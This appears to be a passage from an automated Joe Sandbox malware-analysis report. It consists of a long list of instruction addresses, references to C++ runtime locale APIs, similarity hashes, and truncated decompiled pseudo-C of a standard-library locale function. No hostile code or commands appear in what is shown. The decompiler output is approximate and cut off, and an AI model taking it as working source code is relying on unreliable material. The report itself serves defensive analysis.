                                                                                      0x00408757
                                                                                      0x00408768
                                                                                      0x0040876d
                                                                                      0x00408774
                                                                                      0x00408778
                                                                                      0x0040877f
                                                                                      0x00408785
                                                                                      0x0040878c
                                                                                      0x00408790
                                                                                      0x00408793
                                                                                      0x00408797
                                                                                      0x0040879a
                                                                                      0x0040879d
                                                                                      0x004087a0
                                                                                      0x004087a3
                                                                                      0x004087a7
                                                                                      0x004087a9
                                                                                      0x0040888f
                                                                                      0x00408894
                                                                                      0x00408895
                                                                                      0x00408896
                                                                                      0x00408897
                                                                                      0x00408898
                                                                                      0x00408899
                                                                                      0x0040889a
                                                                                      0x0040889b
                                                                                      0x0040889c
                                                                                      0x0040889d
                                                                                      0x0040889e
                                                                                      0x0040889f
                                                                                      0x004088a0
                                                                                      0x004088a1
                                                                                      0x004088a3
                                                                                      0x004088a5
                                                                                      0x004088b0
                                                                                      0x004088b1
                                                                                      0x004088b4
                                                                                      0x004088b9
                                                                                      0x004088bb
                                                                                      0x004088be
                                                                                      0x004088bf
                                                                                      0x004088c0
                                                                                      0x004088c1
                                                                                      0x004088c5
                                                                                      0x004088cb
                                                                                      0x004088d3
                                                                                      0x004088d6
                                                                                      0x004088db
                                                                                      0x004088e2
                                                                                      0x004088e8
                                                                                      0x004088ee
                                                                                      0x004088f1
                                                                                      0x004088f3
                                                                                      0x004088f9
                                                                                      0x004088fe
                                                                                      0x00408904
                                                                                      0x00408906
                                                                                      0x0040890b
                                                                                      0x0040890b
                                                                                      0x0040890c
                                                                                      0x00408911
                                                                                      0x00408911
                                                                                      0x00408919
                                                                                      0x0040891e
                                                                                      0x0040891e
                                                                                      0x00408924
                                                                                      0x00408927
                                                                                      0x0040892e
                                                                                      0x00408931
                                                                                      0x00408934
                                                                                      0x00408942
                                                                                      0x00408942
                                                                                      0x00408944
                                                                                      0x00000000
                                                                                      0x00408936
                                                                                      0x00408939
                                                                                      0x0040893c
                                                                                      0x0040893e
                                                                                      0x004089a0
                                                                                      0x004089a3
                                                                                      0x004089ad
                                                                                      0x004089b5
                                                                                      0x004089b6
                                                                                      0x004089b7
                                                                                      0x004089bb
                                                                                      0x004089c5
                                                                                      0x00408940
                                                                                      0x00408947
                                                                                      0x00408947
                                                                                      0x0040894b
                                                                                      0x00408960
                                                                                      0x00408960
                                                                                      0x00408962
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040894d
                                                                                      0x0040894d
                                                                                      0x00408952
                                                                                      0x00408955
                                                                                      0x00408964
                                                                                      0x00408964
                                                                                      0x00408966
                                                                                      0x00408973
                                                                                      0x00408978
                                                                                      0x0040897b
                                                                                      0x0040897e
                                                                                      0x004089c6
                                                                                      0x004089cb
                                                                                      0x004089cc
                                                                                      0x004089cd
                                                                                      0x004089ce
                                                                                      0x004089cf
                                                                                      0x004089d0
                                                                                      0x004089d1
                                                                                      0x004089d3
                                                                                      0x004089d4
                                                                                      0x004089d5
                                                                                      0x004089d7
                                                                                      0x004089d9
                                                                                      0x004089db
                                                                                      0x00408a27
                                                                                      0x00408a2a
                                                                                      0x004089e0
                                                                                      0x004089e0
                                                                                      0x004089e0
                                                                                      0x004089e3
                                                                                      0x004089e6
                                                                                      0x00000000
                                                                                      0x004089e8
                                                                                      0x004089e8
                                                                                      0x004089ea
                                                                                      0x004089eb
                                                                                      0x004089f1
                                                                                      0x00408a05
                                                                                      0x00408a05
                                                                                      0x00408a07
                                                                                      0x00408a0c
                                                                                      0x00000000
                                                                                      0x004089f3
                                                                                      0x004089f3
                                                                                      0x004089f6
                                                                                      0x004089fe
                                                                                      0x00408a01
                                                                                      0x00408a2b
                                                                                      0x00408a30
                                                                                      0x00408a31
                                                                                      0x00408a32
                                                                                      0x00408a33
                                                                                      0x00408a34
                                                                                      0x00408a35
                                                                                      0x00408a36
                                                                                      0x00408a37
                                                                                      0x00408a38
                                                                                      0x00408a39
                                                                                      0x00408a3a
                                                                                      0x00408a3b
                                                                                      0x00408a3c
                                                                                      0x00408a3d
                                                                                      0x00408a3e
                                                                                      0x00408a3f
                                                                                      0x00408a40
                                                                                      0x00408a41
                                                                                      0x00408a43
                                                                                      0x00408a46
                                                                                      0x00408a47
                                                                                      0x00408a49
                                                                                      0x00408a50
                                                                                      0x00408a51
                                                                                      0x00408a54
                                                                                      0x00408a59
                                                                                      0x00408a5c
                                                                                      0x00408a5d
                                                                                      0x00408a5f
                                                                                      0x00408b6d
                                                                                      0x00000000
                                                                                      0x00408a65
                                                                                      0x00408a65
                                                                                      0x00408a68
                                                                                      0x00408a6d
                                                                                      0x00408a70
                                                                                      0x00408a73
                                                                                      0x00408a76
                                                                                      0x00408a78
                                                                                      0x00408aa5
                                                                                      0x00408aa7
                                                                                      0x00408aa9
                                                                                      0x00408aab
                                                                                      0x00408ab4
                                                                                      0x00408ab6
                                                                                      0x00408ab8
                                                                                      0x00408abb
                                                                                      0x00408abb
                                                                                      0x00408abe
                                                                                      0x00408ac4
                                                                                      0x00408ad3
                                                                                      0x00408ad5
                                                                                      0x00408ae7
                                                                                      0x00408ae7
                                                                                      0x00408ad7
                                                                                      0x00408ad8
                                                                                      0x00408add
                                                                                      0x00408ae0
                                                                                      0x00408ae3
                                                                                      0x00408ae3
                                                                                      0x00000000
                                                                                      0x00408ac6
                                                                                      0x00408ac6
                                                                                      0x00408ac6
                                                                                      0x00408ac9
                                                                                      0x00408acb
                                                                                      0x00408b72
                                                                                      0x00408b72
                                                                                      0x00000000
                                                                                      0x00408ad1
                                                                                      0x00000000
                                                                                      0x00408ad1
                                                                                      0x00408acb
                                                                                      0x00408aad
                                                                                      0x00408aad
                                                                                      0x00000000
                                                                                      0x00408aad
                                                                                      0x00408a7a
                                                                                      0x00408a7a
                                                                                      0x00408a7c
                                                                                      0x00408a81
                                                                                      0x00408a81
                                                                                      0x00408a84
                                                                                      0x00408a85
                                                                                      0x00408a8a
                                                                                      0x00408a8d
                                                                                      0x00408a8f
                                                                                      0x00408b77
                                                                                      0x00408b77
                                                                                      0x00408b7c
                                                                                      0x00408b7d
                                                                                      0x00408b7e
                                                                                      0x00408b7f
                                                                                      0x00408b80
                                                                                      0x00408b81
                                                                                      0x00408b83
                                                                                      0x00408b86
                                                                                      0x00408b87
                                                                                      0x00408b89
                                                                                      0x00408b90
                                                                                      0x00408b91
                                                                                      0x00408b94
                                                                                      0x00408b99
                                                                                      0x00408b9c
                                                                                      0x00408b9d
                                                                                      0x00408b9f
                                                                                      0x00408ced
                                                                                      0x00000000
                                                                                      0x00408ba5
                                                                                      0x00408ba5
                                                                                      0x00408ba8
                                                                                      0x00408bad
                                                                                      0x00408bb0
                                                                                      0x00408bb3
                                                                                      0x00408bb6
                                                                                      0x00408bb8
                                                                                      0x00408be5
                                                                                      0x00408be7
                                                                                      0x00408be9
                                                                                      0x00408beb
                                                                                      0x00408bf4
                                                                                      0x00408bf6
                                                                                      0x00408bf8
                                                                                      0x00408bfb
                                                                                      0x00408bfb
                                                                                      0x00408bfe
                                                                                      0x00408c04
                                                                                      0x00408c13
                                                                                      0x00408c15
                                                                                      0x00408c27
                                                                                      0x00408c27
                                                                                      0x00408c17
                                                                                      0x00408c18
                                                                                      0x00408c1d
                                                                                      0x00408c20
                                                                                      0x00408c23
                                                                                      0x00408c23
                                                                                      0x00000000
                                                                                      0x00408c06
                                                                                      0x00408c06
                                                                                      0x00408c06
                                                                                      0x00408c09
                                                                                      0x00408c0b
                                                                                      0x00408cf2
                                                                                      0x00408cf2
                                                                                      0x00000000
                                                                                      0x00408c11
                                                                                      0x00000000
                                                                                      0x00408c11
                                                                                      0x00408c0b
                                                                                      0x00408bed
                                                                                      0x00408bed
                                                                                      0x00000000
                                                                                      0x00408bed
                                                                                      0x00408bba
                                                                                      0x00408bba
                                                                                      0x00408bbc
                                                                                      0x00408bc1
                                                                                      0x00408bc1
                                                                                      0x00408bc4
                                                                                      0x00408bc5
                                                                                      0x00408bca
                                                                                      0x00408bcd
                                                                                      0x00408bcf
                                                                                      0x00408cf7
                                                                                      0x00408cf7
                                                                                      0x00408cfc
                                                                                      0x00408cfd
                                                                                      0x00408cfe
                                                                                      0x00408cff
                                                                                      0x00408d00
                                                                                      0x00408d01
                                                                                      0x00408d03
                                                                                      0x00408d06
                                                                                      0x00408d07
                                                                                      0x00408d09
                                                                                      0x00408d10
                                                                                      0x00408d11
                                                                                      0x00408d14
                                                                                      0x00408d19
                                                                                      0x00408d1c
                                                                                      0x00408d1d
                                                                                      0x00408d1f
                                                                                      0x00408e4c
                                                                                      0x00000000
                                                                                      0x00408d25
                                                                                      0x00408d25
                                                                                      0x00408d28
                                                                                      0x00408d2d
                                                                                      0x00408d30
                                                                                      0x00408d33
                                                                                      0x00408d36
                                                                                      0x00408d38
                                                                                      0x00408d65
                                                                                      0x00408d67
                                                                                      0x00408d69
                                                                                      0x00408d6b
                                                                                      0x00408d74
                                                                                      0x00408d76
                                                                                      0x00408d78
                                                                                      0x00408d7b
                                                                                      0x00408d7b
                                                                                      0x00408d7e
                                                                                      0x00408d84
                                                                                      0x00408d93
                                                                                      0x00408d95
                                                                                      0x00408da7
                                                                                      0x00408da7
                                                                                      0x00408d97
                                                                                      0x00408d98
                                                                                      0x00408d9d
                                                                                      0x00408da0
                                                                                      0x00408da3
                                                                                      0x00408da3
                                                                                      0x00000000
                                                                                      0x00408d86
                                                                                      0x00408d86
                                                                                      0x00408d86
                                                                                      0x00408d89
                                                                                      0x00408d8b
                                                                                      0x00408e51
                                                                                      0x00408e51
                                                                                      0x00000000
                                                                                      0x00408d91
                                                                                      0x00000000
                                                                                      0x00408d91
                                                                                      0x00408d8b
                                                                                      0x00408d6d
                                                                                      0x00408d6d
                                                                                      0x00000000
                                                                                      0x00408d6d
                                                                                      0x00408d3a
                                                                                      0x00408d3a
                                                                                      0x00408d3c
                                                                                      0x00408d41
                                                                                      0x00408d41
                                                                                      0x00408d44
                                                                                      0x00408d45
                                                                                      0x00408d4a
                                                                                      0x00408d4d
                                                                                      0x00408d4f
                                                                                      0x00408e56
                                                                                      0x00408e56
                                                                                      0x00408e5b
                                                                                      0x00408e5c
                                                                                      0x00408e5d
                                                                                      0x00408e5e
                                                                                      0x00408e5f
                                                                                      0x00408e60
                                                                                      0x00408e62
                                                                                      0x00408e64
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d7
                                                                                      0x0040723d
                                                                                      0x0040723e
                                                                                      0x004071d9
                                                                                      0x004071dc
                                                                                      0x004071dd
                                                                                      0x004071de
                                                                                      0x004071eb
                                                                                      0x00407201
                                                                                      0x0040720a
                                                                                      0x0040721e
                                                                                      0x0040721e
                                                                                      0x00407220
                                                                                      0x00407228
                                                                                      0x0040722e
                                                                                      0x00407235
                                                                                      0x00000000
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720f
                                                                                      0x00407212
                                                                                      0x0040721a
                                                                                      0x0040723f
                                                                                      0x00407244
                                                                                      0x00407245
                                                                                      0x00407246
                                                                                      0x00407247
                                                                                      0x00407248
                                                                                      0x00407249
                                                                                      0x0040724a
                                                                                      0x0040724b
                                                                                      0x0040724c
                                                                                      0x0040724d
                                                                                      0x0040724e
                                                                                      0x0040724f
                                                                                      0x00407250
                                                                                      0x00407253
                                                                                      0x00407257
                                                                                      0x00407258
                                                                                      0x0040725a
                                                                                      0x00407260
                                                                                      0x00407262
                                                                                      0x00407265
                                                                                      0x0040726a
                                                                                      0x00407271
                                                                                      0x0040721c
                                                                                      0x0040721c
                                                                                      0x00000000
                                                                                      0x0040721c
                                                                                      0x0040721a
                                                                                      0x0040720a
                                                                                      0x00408e6a
                                                                                      0x00408e6a
                                                                                      0x00408e6a
                                                                                      0x00408d55
                                                                                      0x00408d55
                                                                                      0x00408d58
                                                                                      0x00408d5b
                                                                                      0x00408d5e
                                                                                      0x00408da9
                                                                                      0x00408dac
                                                                                      0x00408db3
                                                                                      0x00408db9
                                                                                      0x00408dbc
                                                                                      0x00408dc1
                                                                                      0x00408dc4
                                                                                      0x00408dc8
                                                                                      0x00408dcb
                                                                                      0x00408dcc
                                                                                      0x00408e23
                                                                                      0x00408e24
                                                                                      0x00408e25
                                                                                      0x00408e31
                                                                                      0x00408e3c
                                                                                      0x00408e41
                                                                                      0x00408e49
                                                                                      0x00408dce
                                                                                      0x00408dce
                                                                                      0x00408dd0
                                                                                      0x00408dd1
                                                                                      0x00408dd2
                                                                                      0x00408de0
                                                                                      0x00408de8
                                                                                      0x00408dee
                                                                                      0x00408def
                                                                                      0x00408df2
                                                                                      0x00408df8
                                                                                      0x00408e0c
                                                                                      0x00408e0c
                                                                                      0x00408e0e
                                                                                      0x00408e16
                                                                                      0x00408e20
                                                                                      0x00408dfa
                                                                                      0x00408dfa
                                                                                      0x00408dfd
                                                                                      0x00408e00
                                                                                      0x00408e02
                                                                                      0x00408e05
                                                                                      0x00408e08
                                                                                      0x00000000
                                                                                      0x00408e0a
                                                                                      0x00408e0a
                                                                                      0x00000000
                                                                                      0x00408e0a
                                                                                      0x00408e08
                                                                                      0x00408df8
                                                                                      0x00408dcc
                                                                                      0x00408d4f
                                                                                      0x00408d38
                                                                                      0x00408bd5
                                                                                      0x00408bd5
                                                                                      0x00408bd8
                                                                                      0x00408bdb
                                                                                      0x00408bde
                                                                                      0x00408c29
                                                                                      0x00408c2c
                                                                                      0x00408c33
                                                                                      0x00408c36
                                                                                      0x00408c3b
                                                                                      0x00408c3e
                                                                                      0x00408c42
                                                                                      0x00408c45
                                                                                      0x00408c4d
                                                                                      0x00408c50
                                                                                      0x00408c54
                                                                                      0x00408c57
                                                                                      0x00408cb9
                                                                                      0x00408cba
                                                                                      0x00408cbb
                                                                                      0x00408cc7
                                                                                      0x00408cd2
                                                                                      0x00408cd8
                                                                                      0x00408ce0
                                                                                      0x00408cea
                                                                                      0x00408c59
                                                                                      0x00408c59
                                                                                      0x00408c5b
                                                                                      0x00408c5c
                                                                                      0x00408c5d
                                                                                      0x00408c6b
                                                                                      0x00408c7c
                                                                                      0x00408c84
                                                                                      0x00408c87
                                                                                      0x00408c88
                                                                                      0x00408c8e
                                                                                      0x00408ca2
                                                                                      0x00408ca2
                                                                                      0x00408ca4
                                                                                      0x00408cac
                                                                                      0x00408cb6
                                                                                      0x00408c90
                                                                                      0x00408c90
                                                                                      0x00408c93
                                                                                      0x00408c96
                                                                                      0x00408c98
                                                                                      0x00408c9b
                                                                                      0x00408c9e
                                                                                      0x00000000
                                                                                      0x00408ca0
                                                                                      0x00408ca0
                                                                                      0x00000000
                                                                                      0x00408ca0
                                                                                      0x00408c9e
                                                                                      0x00408c8e
                                                                                      0x00408c57
                                                                                      0x00408bcf
                                                                                      0x00408bb8
                                                                                      0x00408a95
                                                                                      0x00408a95
                                                                                      0x00408a98
                                                                                      0x00408a9b
                                                                                      0x00408a9e
                                                                                      0x00408ae9
                                                                                      0x00408ae9
                                                                                      0x00408af0
                                                                                      0x00408af3
                                                                                      0x00408af6
                                                                                      0x00408af7
                                                                                      0x00408b48
                                                                                      0x00408b49
                                                                                      0x00408b4a
                                                                                      0x00408b4f
                                                                                      0x00408b5a
                                                                                      0x00408b5d
                                                                                      0x00408b62
                                                                                      0x00408b6a
                                                                                      0x00408af9
                                                                                      0x00408af9
                                                                                      0x00408afb
                                                                                      0x00408afc
                                                                                      0x00408afd
                                                                                      0x00408b02
                                                                                      0x00408b05
                                                                                      0x00408b0e
                                                                                      0x00408b0f
                                                                                      0x00408b12
                                                                                      0x00408b17
                                                                                      0x00408b1d
                                                                                      0x00408b31
                                                                                      0x00408b31
                                                                                      0x00408b33
                                                                                      0x00408b3b
                                                                                      0x00408b45
                                                                                      0x00408b1f
                                                                                      0x00408b1f
                                                                                      0x00408b22
                                                                                      0x00408b25
                                                                                      0x00408b27
                                                                                      0x00408b2a
                                                                                      0x00408b2d
                                                                                      0x00000000
                                                                                      0x00408b2f
                                                                                      0x00408b2f
                                                                                      0x00000000
                                                                                      0x00408b2f
                                                                                      0x00408b2d
                                                                                      0x00408b1d
                                                                                      0x00408af7
                                                                                      0x00408a8f
                                                                                      0x00408a78
                                                                                      0x00408a03
                                                                                      0x00408a03
                                                                                      0x00000000
                                                                                      0x00408a03
                                                                                      0x00408a01
                                                                                      0x004089f1
                                                                                      0x00000000
                                                                                      0x00408a0f
                                                                                      0x00408a0f
                                                                                      0x00408a16
                                                                                      0x00408a1d
                                                                                      0x00408a20
                                                                                      0x00408a23
                                                                                      0x00408a23
                                                                                      0x00000000
                                                                                      0x004089e0
                                                                                      0x00408980
                                                                                      0x00408980
                                                                                      0x00408983
                                                                                      0x00408987
                                                                                      0x0040898b
                                                                                      0x00408990
                                                                                      0x00408997
                                                                                      0x0040899a
                                                                                      0x00000000
                                                                                      0x0040899a
                                                                                      0x00408968
                                                                                      0x00408968
                                                                                      0x00000000
                                                                                      0x00408968
                                                                                      0x00408957
                                                                                      0x0040895d
                                                                                      0x00000000
                                                                                      0x0040895d
                                                                                      0x00408955
                                                                                      0x0040894b
                                                                                      0x0040893e
                                                                                      0x004087af
                                                                                      0x004087b4
                                                                                      0x004087b9
                                                                                      0x004087c0
                                                                                      0x004087c9
                                                                                      0x004087ce
                                                                                      0x004087d3
                                                                                      0x004087d6
                                                                                      0x004087d9
                                                                                      0x004087db
                                                                                      0x004087de
                                                                                      0x004087e3
                                                                                      0x004087e3
                                                                                      0x004087e6
                                                                                      0x004087e9
                                                                                      0x004087f0
                                                                                      0x004087f2
                                                                                      0x004087f5
                                                                                      0x004087fa
                                                                                      0x004087fa
                                                                                      0x004087fd
                                                                                      0x00408800
                                                                                      0x00408807
                                                                                      0x00408809
                                                                                      0x0040880c
                                                                                      0x00408811
                                                                                      0x00408811
                                                                                      0x00408814
                                                                                      0x00408817
                                                                                      0x0040881e
                                                                                      0x00408820
                                                                                      0x00408823
                                                                                      0x00408828
                                                                                      0x00408828
                                                                                      0x0040882b
                                                                                      0x0040882e
                                                                                      0x00408835
                                                                                      0x00408837
                                                                                      0x0040883a
                                                                                      0x0040883f
                                                                                      0x0040883f
                                                                                      0x00408842
                                                                                      0x00408845
                                                                                      0x0040884c
                                                                                      0x0040884e
                                                                                      0x00408851
                                                                                      0x00408856
                                                                                      0x00408856
                                                                                      0x0040885c
                                                                                      0x00408863
                                                                                      0x00408868
                                                                                      0x0040886c
                                                                                      0x00408870
                                                                                      0x0040887c
                                                                                      0x0040887f
                                                                                      0x00000000
                                                                                      0x0040887f
                                                                                      0x00408735
                                                                                      0x00408735
                                                                                      0x00000000
                                                                                      0x00408735
                                                                                      0x00408724
                                                                                      0x00408727
                                                                                      0x00000000
                                                                                      0x00408727
                                                                                      0x00408722
                                                                                      0x004086ec
                                                                                      0x004086ec
                                                                                      0x004086ef
                                                                                      0x004086f9
                                                                                      0x00408701
                                                                                      0x00408702
                                                                                      0x00408703
                                                                                      0x00408707
                                                                                      0x00408711
                                                                                      0x00408711
                                                                                      0x004086ea
                                                                                      0x0040855f
                                                                                      0x00408564
                                                                                      0x00408569
                                                                                      0x00408570
                                                                                      0x00408579
                                                                                      0x0040857e
                                                                                      0x00408583
                                                                                      0x00408586
                                                                                      0x00408589
                                                                                      0x0040858b
                                                                                      0x0040858e
                                                                                      0x00408593
                                                                                      0x00408593
                                                                                      0x00408596
                                                                                      0x00408599
                                                                                      0x004085a0
                                                                                      0x004085a2
                                                                                      0x004085a5
                                                                                      0x004085aa
                                                                                      0x004085aa
                                                                                      0x004085ad
                                                                                      0x004085b0
                                                                                      0x004085b7
                                                                                      0x004085b9
                                                                                      0x004085bc
                                                                                      0x004085c1
                                                                                      0x004085c1
                                                                                      0x004085c4
                                                                                      0x004085c7
                                                                                      0x004085ce
                                                                                      0x004085d0
                                                                                      0x004085d3
                                                                                      0x004085d8
                                                                                      0x004085d8
                                                                                      0x004085db
                                                                                      0x004085de
                                                                                      0x004085e5
                                                                                      0x004085e7
                                                                                      0x004085ea
                                                                                      0x004085ef
                                                                                      0x004085ef
                                                                                      0x004085f2
                                                                                      0x004085f5
                                                                                      0x004085fc
                                                                                      0x004085fe
                                                                                      0x00408601
                                                                                      0x00408606
                                                                                      0x00408606
                                                                                      0x0040860c
                                                                                      0x00408613
                                                                                      0x00408618
                                                                                      0x0040861c
                                                                                      0x00408620
                                                                                      0x0040862c
                                                                                      0x0040862f
                                                                                      0x00000000
                                                                                      0x0040862f
                                                                                      0x004084e5
                                                                                      0x004084e5
                                                                                      0x00000000
                                                                                      0x004084e5
                                                                                      0x004084d4
                                                                                      0x004084d7
                                                                                      0x00000000
                                                                                      0x004084d7
                                                                                      0x004084d2
                                                                                      0x0040849c
                                                                                      0x0040849c
                                                                                      0x0040849f
                                                                                      0x004084a9
                                                                                      0x004084b1
                                                                                      0x004084b2
                                                                                      0x004084b3
                                                                                      0x004084b7
                                                                                      0x004084c1
                                                                                      0x004084c1
                                                                                      0x0040849a
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408436
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408458
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408518
                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00408564
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040857E
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00408613
                                                                                      • std::_Facet_Register.LIBCPMT ref: 00408620
                                                                                        • Part of subcall function 00412430: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041243C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                      • String ID: Pr@$bad locale name$y<@
                                                                                      • API String ID: 1592514138-1561844833
                                                                                      • Opcode ID: ed828901e3a0acef6296c7418d6f6f602c7f64c6049e81cc2cd10555e3987ff7
                                                                                      • Instruction ID: eee323774e020d7eb017d28b1302df44cf36fb0ce7af8f549eb97eee52ec8172
                                                                                      • Opcode Fuzzy Hash: ed828901e3a0acef6296c7418d6f6f602c7f64c6049e81cc2cd10555e3987ff7
                                                                                      • Instruction Fuzzy Hash: 1361ADB0D00249DBDB10DFA5DA45BDEBBB4AF54314F14402EE845BB381EB78A948CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 52%
                                                                                      			E00408650(void* __ebx, void* __edx, void* __edi, signed int __esi, signed int* _a4) {
                                                                                      				char _v0;
                                                                                      				char _v4;
                                                                                      				signed int _v8;
                                                                                      				char _v12;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				char _v48;
                                                                                      				signed int _v52;
                                                                                      				short _v56;
                                                                                      				signed int _v60;
                                                                                      				short _v64;
                                                                                      				signed int _v68;
                                                                                      				char _v72;
                                                                                      				signed int _v76;
                                                                                      				char _v80;
                                                                                      				signed int _v84;
                                                                                      				char _v88;
                                                                                      				intOrPtr _v100;
                                                                                      				signed int _v112;
                                                                                      				char _v120;
                                                                                      				signed int _v124;
                                                                                      				intOrPtr _v132;
                                                                                      				char _v136;
                                                                                      				signed int _v140;
                                                                                      				signed int _v160;
                                                                                      				signed int _v172;
                                                                                      				signed int _v184;
                                                                                      				signed int _v196;
                                                                                      				signed int _v216;
                                                                                      				signed int _v228;
                                                                                      				signed int _v252;
                                                                                      				signed int _t215;
                                                                                      				signed int _t216;
                                                                                      				signed int _t219;
                                                                                      				signed int _t223;
                                                                                      				signed int _t226;
                                                                                      				signed int _t231;
                                                                                      				signed int _t232;
                                                                                      				void* _t239;
                                                                                      				void* _t240;
                                                                                      				intOrPtr _t241;
                                                                                      				signed int _t268;
                                                                                      				unsigned int _t270;
                                                                                      				void* _t271;
                                                                                      				signed int _t286;
                                                                                      				signed int _t288;
                                                                                      				signed int _t290;
                                                                                      				unsigned int _t292;
                                                                                      				void* _t293;
                                                                                      				intOrPtr _t296;
                                                                                      				signed int _t309;
                                                                                      				signed int _t311;
                                                                                      				signed int _t313;
                                                                                      				unsigned int _t315;
                                                                                      				void* _t316;
                                                                                      				signed int _t325;
                                                                                      				signed int _t327;
                                                                                      				void* _t331;
                                                                                      				signed int _t336;
                                                                                      				signed int _t337;
                                                                                      				signed int _t342;
                                                                                      				signed int _t343;
                                                                                      				signed int _t344;
                                                                                      				signed int _t345;
                                                                                      				signed int _t346;
                                                                                      				signed int _t347;
                                                                                      				void* _t358;
                                                                                      				signed int* _t362;
                                                                                      				signed int _t363;
                                                                                      				void* _t364;
                                                                                      				signed int _t365;
                                                                                      				void* _t366;
                                                                                      				signed int* _t367;
                                                                                      				signed int* _t368;
                                                                                      				signed int _t376;
                                                                                      				signed int _t384;
                                                                                      				intOrPtr _t390;
                                                                                      				signed int* _t391;
                                                                                      				void* _t395;
                                                                                      				signed int _t399;
                                                                                      				void* _t401;
                                                                                      				void* _t408;
                                                                                      				void* _t411;
                                                                                      				void* _t417;
                                                                                      				intOrPtr _t419;
                                                                                      				signed int _t420;
                                                                                      				signed int _t421;
                                                                                      				signed int _t422;
                                                                                      				intOrPtr _t426;
                                                                                      				signed int _t428;
                                                                                      				signed int _t429;
                                                                                      				signed int _t431;
                                                                                      				void* _t432;
                                                                                      				signed int _t433;
                                                                                      				signed int _t434;
                                                                                      				void* _t435;
                                                                                      				signed int _t437;
                                                                                      				signed int _t449;
                                                                                      				void* _t450;
                                                                                      				intOrPtr _t451;
                                                                                      				signed int _t452;
                                                                                      				void* _t453;
                                                                                      				signed int _t454;
                                                                                      				signed int _t456;
                                                                                      				signed int _t457;
                                                                                      				intOrPtr _t458;
                                                                                      				void* _t460;
                                                                                      				signed int _t461;
                                                                                      				signed int _t464;
                                                                                      				signed int _t465;
                                                                                      				signed int _t467;
                                                                                      				signed int _t470;
                                                                                      				signed int _t471;
                                                                                      				signed int _t473;
                                                                                      				signed int _t476;
                                                                                      				signed int _t478;
                                                                                      				signed int _t482;
                                                                                      				signed int _t484;
                                                                                      				void* _t486;
                                                                                      				void* _t488;
                                                                                      				void* _t489;
                                                                                      				signed int _t498;
                                                                                      				void* _t499;
                                                                                      				signed int _t501;
                                                                                      				void* _t502;
                                                                                      				void* _t504;
                                                                                      				void* _t505;
                                                                                      				signed int _t506;
                                                                                      				void* _t523;
                                                                                      
                                                                                      				_t448 = __esi;
                                                                                      				_t417 = __edx;
                                                                                      				_t482 = _t498;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431c0c);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t499 = _t498 - 0x48;
                                                                                      				_t215 =  *0x443048; // 0x9900ec21
                                                                                      				_t216 = _t215 ^ _t482;
                                                                                      				_v20 = _t216;
                                                                                      				_push(__ebx);
                                                                                      				_push(__esi);
                                                                                      				_push(__edi);
                                                                                      				_push(_t216);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t362 = _a4;
                                                                                      				_t375 =  &_v28;
                                                                                      				_v24 = _t362;
                                                                                      				E0041247D( &_v28, 0);
                                                                                      				_v8 = 0;
                                                                                      				_t431 =  *0x444fc8; // 0x0
                                                                                      				_t219 =  *0x444f44; // 0x0
                                                                                      				_v36 = _t219;
                                                                                      				if(_t431 == 0) {
                                                                                      					__ecx =  &_v32;
                                                                                      					__eax = E0041247D( &_v32, __edi);
                                                                                      					__eflags =  *0x444fc8 - __edi; // 0x0
                                                                                      					if(__eflags == 0) {
                                                                                      						__eax =  *0x444310; // 0x2
                                                                                      						__eax = __eax + 1;
                                                                                      						__eflags = __eax;
                                                                                      						 *0x444310 = __eax;
                                                                                      						 *0x444fc8 = __eax;
                                                                                      					}
                                                                                      					__ecx =  &_v32;
                                                                                      					__eax = E004124D5(__ecx);
                                                                                      					__edi =  *0x444fc8; // 0x0
                                                                                      				}
                                                                                      				_t25 =  &(_t362[1]); // 0x0
                                                                                      				_t376 =  *_t25;
                                                                                      				_t363 = _t431 * 4;
                                                                                      				__eflags = _t431 -  *((intOrPtr*)(_t376 + 0xc));
                                                                                      				if(_t431 >=  *((intOrPtr*)(_t376 + 0xc))) {
                                                                                      					_t449 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L17;
                                                                                      				} else {
                                                                                      					_t449 =  *(_t363 +  *((intOrPtr*)(_t376 + 8)));
                                                                                      					__eflags = _t449;
                                                                                      					if(_t449 == 0) {
                                                                                      						L17:
                                                                                      						__eflags =  *((char*)(_t376 + 0x14));
                                                                                      						if( *((char*)(_t376 + 0x14)) == 0) {
                                                                                      							L20:
                                                                                      							__eflags = _t449;
                                                                                      							if(_t449 != 0) {
                                                                                      								goto L15;
                                                                                      							} else {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t358 = E0041265A();
                                                                                      							__eflags = _t431 -  *((intOrPtr*)(_t358 + 0xc));
                                                                                      							if(_t431 >=  *((intOrPtr*)(_t358 + 0xc))) {
                                                                                      								L21:
                                                                                      								_t223 = _v36;
                                                                                      								__eflags = _t223;
